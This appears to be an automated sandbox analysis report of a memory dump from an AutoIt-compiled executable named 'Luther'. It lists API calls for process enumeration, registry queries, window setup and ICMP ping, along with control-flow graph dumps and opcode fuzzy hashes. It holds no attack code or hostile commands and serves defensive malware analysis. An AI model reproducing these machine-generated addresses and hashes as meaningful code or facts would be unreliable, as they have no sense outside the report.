                                                                                                          • Opcode Fuzzy Hash: 897b503413c8d01dbe75e299192a2f16fd0fade15753c58301aed723dff5fc08
                                                                                                          • Instruction Fuzzy Hash: 1931723100C355AFC705EB64CC458AFBBE8AE95304F406E6DF5D6A2191DB22DA09CB53
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00E9DDAC
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00E9DDBA
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00E9DDDA
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00E9DE87
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                          • String ID:
                                                                                                          • API String ID: 420147892-0
                                                                                                          • Opcode ID: 77e9e3b6e9438c9604af45701c6aac05ae35fc9cb0002a029240d8227e07f1a1
                                                                                                          • Instruction ID: d6a8c90d0db24dd98f172138ab9ffa66d3d61cb2843473f5d3b7cd6ec4b5035e
                                                                                                          • Opcode Fuzzy Hash: 77e9e3b6e9438c9604af45701c6aac05ae35fc9cb0002a029240d8227e07f1a1
                                                                                                          • Instruction Fuzzy Hash: 2431B4711083009FD710EF60CC85EAFBFE8AF99354F44192DF582A71A1DB729949CB92
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleMemoryProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 2407445808-0
                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction ID: 3bcfda58e3f1ebb3bef1dfbc599e0dbfa6c4e0f3d68e337e2eb84430d3a69106
                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction Fuzzy Hash: 7431D770A00106DFCB18CF58D590A69F7A5FF49305B649EA5E809DB292D732EDC5CBC0

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 e4ac3e-e4b063 call e38ec0 call e4bc58 call e3e6a0 7 e88584-e88591 0->7 8 e4b069-e4b073 0->8 11 e88593 7->11 12 e88596-e885a5 7->12 9 e8896b-e88979 8->9 10 e4b079-e4b07e 8->10 17 e8897b 9->17 18 e8897e 9->18 13 e4b084-e4b090 call e4b5b6 10->13 14 e885b2-e885b4 10->14 11->12 15 e885aa 12->15 16 e885a7 12->16 22 e885bd 13->22 25 e4b096-e4b0a3 call e3c98d 13->25 14->22 15->14 16->15 17->18 20 e88985-e8898e 18->20 23 e88990 20->23 24 e88993 20->24 26 e885c7 22->26 23->24 27 e8899c-e889eb call e3e6a0 call e4bbbe * 2 24->27 33 e4b0ab-e4b0b4 25->33 31 e885cf-e885d2 26->31 62 e4b1e0-e4b1f5 27->62 63 e889f1-e88a03 call e4b5b6 27->63 34 e885d8-e88600 call e54cd3 call e37ad5 31->34 35 e4b158-e4b16f 31->35 37 e4b0b8-e4b0d6 call e54d98 33->37 75 e8862d-e88651 call e37b1a call e3bd98 34->75 76 e88602-e88606 34->76 40 e4b175 35->40 41 e88954-e88957 35->41 56 e4b0e5 37->56 57 e4b0d8-e4b0e1 37->57 45 e888ff-e88920 call e3e6a0 40->45 46 e4b17b-e4b17e 40->46 47 e8895d-e88960 41->47 48 e88a41-e88a79 call e3e6a0 call e4bbbe 41->48 45->62 80 e88926-e88938 call e4b5b6 45->80 53 e4b184-e4b187 46->53 54 e88729-e88743 call e4bbbe 46->54 47->27 55 e88962-e88965 47->55 48->62 106 e88a7f-e88a91 call e4b5b6 48->106 64 e886ca-e886e0 call e36c03 53->64 65 e4b18d-e4b190 53->65 85 e88749-e8874c 54->85 86 e8888f-e888b5 call e3e6a0 54->86 55->9 55->62 56->26 68 e4b0eb-e4b0fc 56->68 57->37 66 e4b0e3 57->66 70 e88ac9-e88acf 62->70 71 e4b1fb-e4b20b call e3e6a0 62->71 97 e88a2f-e88a3c call e3c98d 63->97 98 e88a05-e88a0d 63->98 64->62 95 e886e6-e886fc call e4b5b6 64->95 78 e4b196-e4b1b8 call e3e6a0 65->78 79 e88656-e88659 65->79 66->68 68->9 69 e4b102-e4b11c 68->69 69->31 82 e4b122-e4b154 call e4bbbe call e3e6a0 69->82 70->33 88 e88ad5 70->88 75->79 76->75 90 e88608-e8862b call e3ad40 76->90 78->62 114 e4b1ba-e4b1cc call e4b5b6 78->114 79->9 83 e8865f-e88674 call e36c03 79->83 117 e8893a-e88943 call e3c98d 80->117 118 e88945 80->118 82->35 83->62 136 e8867a-e88690 call e4b5b6 83->136 104 e8874e-e88751 85->104 105 e887bf-e887de call e3e6a0 85->105 86->62 139 e888bb-e888cd call e4b5b6 86->139 88->9 90->75 90->76 142 e8870d-e88716 call e38ec0 95->142 143 e886fe-e8870b call e38ec0 95->143 149 e88ac2-e88ac4 97->149 112 e88a1e-e88a29 call e3b4b1 98->112 113 e88a0f-e88a13 98->113 120 e88ada-e88ae8 104->120 121 e88757-e88774 call e3e6a0 104->121 105->62 141 e887e4-e887f6 call e4b5b6 105->141 153 e88a93-e88a9b 106->153 154 e88ab5-e88abe call e3c98d 106->154 112->97 161 e88b0b-e88b19 112->161 113->112 129 e88a15-e88a19 113->129 162 e886ba-e886c3 call e3c98d 114->162 163 e4b1d2-e4b1de 114->163 135 e88949-e8894f 117->135 118->135 127 e88aea 120->127 128 e88aed-e88afd 120->128 121->62 165 e8877a-e8878c call e4b5b6 121->165 127->128 144 e88aff 128->144 145 e88b02-e88b06 128->145 146 e88aa1-e88aa3 129->146 135->62 178 e8869d-e886ab call e38ec0 136->178 179 e88692-e8869b call e3c98d 136->179 169 e888de 139->169 170 e888cf-e888dc call e3c98d 139->170 141->62 185 e887fc-e88805 call e4b5b6 141->185 186 e88719-e88724 call e38577 142->186 143->186 144->145 145->71 146->62 149->62 166 e88aa8-e88ab3 call e3b4b1 153->166 167 e88a9d 153->167 154->149 175 e88b1b 161->175 176 e88b1e-e88b21 161->176 162->64 163->62 197 e8878e-e8879d call e3c98d 165->197 198 e8879f 165->198 166->154 166->161 167->146 184 e888e2-e888e9 169->184 170->184 175->176 176->20 204 e886ae-e886b5 178->204 179->204 191 e888eb-e888f0 call e3396b 184->191 192 e888f5 call e33907 184->192 210 e88818 185->210 211 e88807-e88816 call e3c98d 185->211 186->62 191->62 209 e888fa 192->209 199 e887a3-e887ae call e59334 197->199 198->199 199->9 215 e887b4-e887ba 199->215 204->62 209->62 214 e8881c-e8883f 210->214 211->214 217 e8884d-e88850 214->217 218 e88841-e88848 214->218 215->62 219 e88860-e88863 217->219 220 e88852-e8885b 217->220 218->217 221 e88873-e88876 219->221 222 e88865-e8886e 219->222 220->219 221->62 223 e8887c-e8888a 221->223 222->221 223->62
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4$@$P$`$d0b$d10m0$d1b$d1r0,2$d5m0$i$t$t
                                                                                                          • API String ID: 0-3986754044
                                                                                                          • Opcode ID: 9561f42811cedb442abb674a6841df9063f6730afd2ef6a9c1d8e6a671551097
                                                                                                          • Instruction ID: 959fc7d557a66c811cd9d79961016704cea6fe27702ab449e7cc2978e142a5c0
                                                                                                          • Opcode Fuzzy Hash: 9561f42811cedb442abb674a6841df9063f6730afd2ef6a9c1d8e6a671551097
                                                                                                          • Instruction Fuzzy Hash: BF624770508341CFC328DF24C595AAABBE1BF88308F50996EE89DAB351DB71D945CF92
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InputStateTimetime
                                                                                                          • String ID:
                                                                                                          • API String ID: 2164325655-0
                                                                                                          • Opcode ID: 8cf6f559b43305e7c05f44dca1abf8072a447e98d79701cf1c210702d2577a6e
                                                                                                          • Instruction ID: f5e8c8c4bdd5af56b439bdfbe4968d63f933663f907603ca9d41548147b4c576
                                                                                                          • Opcode Fuzzy Hash: 8cf6f559b43305e7c05f44dca1abf8072a447e98d79701cf1c210702d2577a6e
                                                                                                          • Instruction Fuzzy Hash: F332F670A04702DFD728DF24C888BAABBE5FF41308F14652DE559A72A1D771E944CF92

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E33657
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00E33681
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E33692
                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00E336AF
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E336BF
                                                                                                          • LoadIconW.USER32(000000A9), ref: 00E336D5
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E336E4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$0+m"$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-2301606172
                                                                                                          • Opcode ID: 96033f22c42891a440b37f40c869736080c59c5499668c7533680c428c2fec5a
                                                                                                          • Instruction ID: d7b5e6275364deb8a32c336b19602821f0144326dd36fc3a65d971de30ea1759
                                                                                                          • Opcode Fuzzy Hash: 96033f22c42891a440b37f40c869736080c59c5499668c7533680c428c2fec5a
                                                                                                          • Instruction Fuzzy Hash: A821E2B1905318AFDB409FA5ED89B9DBBB4FB08710F00512AF611B62A0D7B64545AFA0

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 593 e709db-e70a0b call e707af 596 e70a26-e70a32 call e65594 593->596 597 e70a0d-e70a18 call e5f636 593->597 603 e70a34-e70a49 call e5f636 call e5f649 596->603 604 e70a4b-e70a94 call e7071a 596->604 602 e70a1a-e70a21 call e5f649 597->602 613 e70cfd-e70d03 602->613 603->602 611 e70a96-e70a9f 604->611 612 e70b01-e70b0a GetFileType 604->612 616 e70ad6-e70afc GetLastError call e5f613 611->616 617 e70aa1-e70aa5 611->617 618 e70b53-e70b56 612->618 619 e70b0c-e70b3d GetLastError call e5f613 CloseHandle 612->619 616->602 617->616 622 e70aa7-e70ad4 call e7071a 617->622 620 e70b5f-e70b65 618->620 621 e70b58-e70b5d 618->621 619->602 630 e70b43-e70b4e call e5f649 619->630 625 e70b69-e70bb7 call e654dd 620->625 626 e70b67 620->626 621->625 622->612 622->616 636 e70bc7-e70beb call e704cd 625->636 637 e70bb9-e70bc5 call e7092b 625->637 626->625 630->602 642 e70bfe-e70c41 636->642 643 e70bed 636->643 637->636 644 e70bef-e70bf9 call e68a2e 637->644 646 e70c43-e70c47 642->646 647 e70c62-e70c70 642->647 643->644 644->613 646->647 649 e70c49-e70c5d 646->649 650 e70c76-e70c7a 647->650 651 e70cfb 647->651 649->647 650->651 652 e70c7c-e70caf CloseHandle call e7071a 650->652 651->613 655 e70ce3-e70cf7 652->655 656 e70cb1-e70cdd GetLastError call e5f613 call e656a6 652->656 655->651 656->655
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E7071A: CreateFileW.KERNEL32(00000000,00000000,?,00E70A84,?,?,00000000,?,00E70A84,00000000,0000000C), ref: 00E70737
                                                                                                          • GetLastError.KERNEL32 ref: 00E70AEF
                                                                                                          • __dosmaperr.LIBCMT ref: 00E70AF6
                                                                                                          • GetFileType.KERNEL32(00000000), ref: 00E70B02
                                                                                                          • GetLastError.KERNEL32 ref: 00E70B0C
                                                                                                          • __dosmaperr.LIBCMT ref: 00E70B15
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00E70B35
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00E70C7F
                                                                                                          • GetLastError.KERNEL32 ref: 00E70CB1
                                                                                                          • __dosmaperr.LIBCMT ref: 00E70CB8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                          • String ID: H
                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                          • Opcode ID: ab1c8d477fa5d39e85f85491beff57a5c446b1b7d4c517d5171c29d15d8a226a
                                                                                                          • Instruction ID: 3482948c7a9764df59e5adc8004f1b4db3bf5b3f33de5b6774690fb79f06cd9a
                                                                                                          • Opcode Fuzzy Hash: ab1c8d477fa5d39e85f85491beff57a5c446b1b7d4c517d5171c29d15d8a226a
                                                                                                          • Instruction Fuzzy Hash: 73A14332A042498FCF19AF68D892BAE7BE1EB06324F145159F815FB2D1DB319D02CB91

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 00E35594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E74B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00E355B2
                                                                                                            • Part of subcall function 00E35238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E3525A
                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E353C4
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E74BFD
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E74C3E
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00E74C80
                                                                                                          • _wcslen.LIBCMT ref: 00E74CE7
                                                                                                          • _wcslen.LIBCMT ref: 00E74CF6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                          • API String ID: 98802146-2727554177
                                                                                                          • Opcode ID: 1feff22b482e5bd9e3b891d7dcf944646ef2a7260ae4862367cdcd9e3aa823b8
                                                                                                          • Instruction ID: 41781a2a6fba8281f2f26851c5d5426202cafc6cf6f7d5fcec2e855bdd7c4af0
                                                                                                          • Opcode Fuzzy Hash: 1feff22b482e5bd9e3b891d7dcf944646ef2a7260ae4862367cdcd9e3aa823b8
                                                                                                          • Instruction Fuzzy Hash: 99719F71105305AEC304EF69EC8599BBBECFF88340F80682EF545A71A1DB729A49DB52

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E334DE
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00E334ED
                                                                                                          • LoadIconW.USER32(00000063), ref: 00E33503
                                                                                                          • LoadIconW.USER32(000000A4), ref: 00E33515
                                                                                                          • LoadIconW.USER32(000000A2), ref: 00E33527
                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E3353F
                                                                                                          • RegisterClassExW.USER32(?), ref: 00E33590
                                                                                                            • Part of subcall function 00E33624: GetSysColorBrush.USER32(0000000F), ref: 00E33657
                                                                                                            • Part of subcall function 00E33624: RegisterClassExW.USER32(00000030), ref: 00E33681
                                                                                                            • Part of subcall function 00E33624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E33692
                                                                                                            • Part of subcall function 00E33624: InitCommonControlsEx.COMCTL32(?), ref: 00E336AF
                                                                                                            • Part of subcall function 00E33624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E336BF
                                                                                                            • Part of subcall function 00E33624: LoadIconW.USER32(000000A9), ref: 00E336D5
                                                                                                            • Part of subcall function 00E33624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E336E4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                          • API String ID: 423443420-4155596026
                                                                                                          • Opcode ID: af1fd6a5e0c0e6a9e278e4d2a8fb0260ab1c652a25ebc8ce1fd73a37eeb75a80
                                                                                                          • Instruction ID: 4f1eed2730556436e630b44002e3c143babaf32bfc6e055626c757655a5768fb
                                                                                                          • Opcode Fuzzy Hash: af1fd6a5e0c0e6a9e278e4d2a8fb0260ab1c652a25ebc8ce1fd73a37eeb75a80
                                                                                                          • Instruction Fuzzy Hash: CB212C70D00318AFDF509FA5EC59BA9BFB5FB48B50F00402AE604B62A0D7BA4545EFA0

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 734 eb0fb8-eb0fef call e3e6a0 737 eb100f-eb1021 WSAStartup 734->737 738 eb0ff1-eb0ffe call e3c98d 734->738 739 eb1023-eb1031 737->739 740 eb1054-eb1091 call e4c1f6 call e38ec0 call e4f9d4 inet_addr gethostbyname 737->740 738->737 749 eb1000-eb100b call e3c98d 738->749 742 eb1033 739->742 743 eb1036-eb1046 739->743 757 eb1093-eb10a0 IcmpCreateFile 740->757 758 eb10a2-eb10b0 740->758 742->743 746 eb104b-eb104f 743->746 747 eb1048 743->747 750 eb1249-eb1251 746->750 747->746 749->737 757->758 759 eb10d3-eb1100 call e5017b call e3423c 757->759 760 eb10b2 758->760 761 eb10b5-eb10c5 758->761 770 eb112b-eb1148 IcmpSendEcho 759->770 771 eb1102-eb1129 IcmpSendEcho 759->771 760->761 762 eb10ca-eb10ce 761->762 763 eb10c7 761->763 765 eb1240-eb1244 call e3bd98 762->765 763->762 765->750 772 eb114c-eb114e 770->772 771->772 773 eb11ae-eb11bc 772->773 774 eb1150-eb1155 772->774 775 eb11be 773->775 776 eb11c1-eb11c8 773->776 777 eb115b-eb1160 774->777 778 eb11f8-eb120a call e3e6a0 774->778 775->776 780 eb11e4-eb11ed 776->780 781 eb11ca-eb11d8 777->781 782 eb1162-eb1167 777->782 789 eb120c-eb120e 778->789 790 eb1210 778->790 786 eb11ef 780->786 787 eb11f2-eb11f6 780->787 784 eb11da 781->784 785 eb11dd 781->785 782->773 788 eb1169-eb116e 782->788 784->785 785->780 786->787 791 eb1212-eb1229 IcmpCloseHandle WSACleanup 787->791 792 eb1193-eb11a1 788->792 793 eb1170-eb1175 788->793 789->791 790->791 791->765 797 eb122b-eb123d call e5013d call e50184 791->797 795 eb11a3 792->795 796 eb11a6-eb11ac 792->796 793->781 794 eb1177-eb1185 793->794 798 eb118a-eb1191 794->798 799 eb1187 794->799 795->796 796->780 797->765 798->780 799->798
                                                                                                          APIs
                                                                                                          • WSAStartup.WS2_32(00000101,?), ref: 00EB1019
                                                                                                          • inet_addr.WSOCK32(?), ref: 00EB1079
                                                                                                          • gethostbyname.WS2_32(?), ref: 00EB1085
                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 00EB1093
                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB1123
                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB1142
                                                                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00EB1216
                                                                                                          • WSACleanup.WSOCK32 ref: 00EB121C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                          • String ID: Ping
                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                          • Opcode ID: b2b1bdcc210a15a036cf7a70db141e1fe92f5b0c10e41a59566f79a8f7ea743b
                                                                                                          • Instruction ID: 6a18a3b32abd99702919d9e63e3d1eed990e59606dab4435bb217f2d86241a46
                                                                                                          • Opcode Fuzzy Hash: b2b1bdcc210a15a036cf7a70db141e1fe92f5b0c10e41a59566f79a8f7ea743b
                                                                                                          • Instruction Fuzzy Hash: F491DF316092019FD320DF19C898F97BBE0BF48328F5495A9F569AB7A2C731ED45CB81

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 804 e3370f-e33724 805 e33726-e33729 804->805 806 e33784-e33786 804->806 807 e3372b-e33732 805->807 808 e3378a 805->808 806->805 809 e33788 806->809 810 e33804-e3380c PostQuitMessage 807->810 811 e33738-e3373d 807->811 813 e73df4-e73e1c call e32f92 call e4f23c 808->813 814 e33790-e33795 808->814 812 e3376f-e33777 DefWindowProcW 809->812 819 e337b8-e337ba 810->819 815 e33743-e33747 811->815 816 e73e61-e73e75 call e9c8f7 811->816 818 e3377d-e33783 812->818 849 e73e21-e73e28 813->849 820 e33797-e3379a 814->820 821 e337bc-e337e3 SetTimer RegisterWindowMessageW 814->821 822 e3380e-e33818 call e4fcad 815->822 823 e3374d-e33752 815->823 816->819 840 e73e7b 816->840 819->818 827 e73d95-e73d98 820->827 828 e337a0-e337b3 KillTimer call e33907 call e359ff 820->828 821->819 824 e337e5-e337f0 CreatePopupMenu 821->824 842 e3381d 822->842 829 e73e46-e73e4d 823->829 830 e33758-e3375d 823->830 824->819 834 e73dd0-e73def MoveWindow 827->834 835 e73d9a-e73d9e 827->835 828->819 829->812 837 e73e53-e73e5c call e91423 829->837 838 e33763-e33769 830->838 839 e337f2-e33802 call e3381f 830->839 834->819 843 e73da0-e73da3 835->843 844 e73dbf-e73dcb SetFocus 835->844 837->812 838->812 838->849 839->819 840->812 842->819 843->838 850 e73da9-e73dba call e32f92 843->850 844->819 849->812 853 e73e2e-e73e41 call e33907 call e3396b 849->853 850->819 853->812
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E33709,?,?), ref: 00E33777
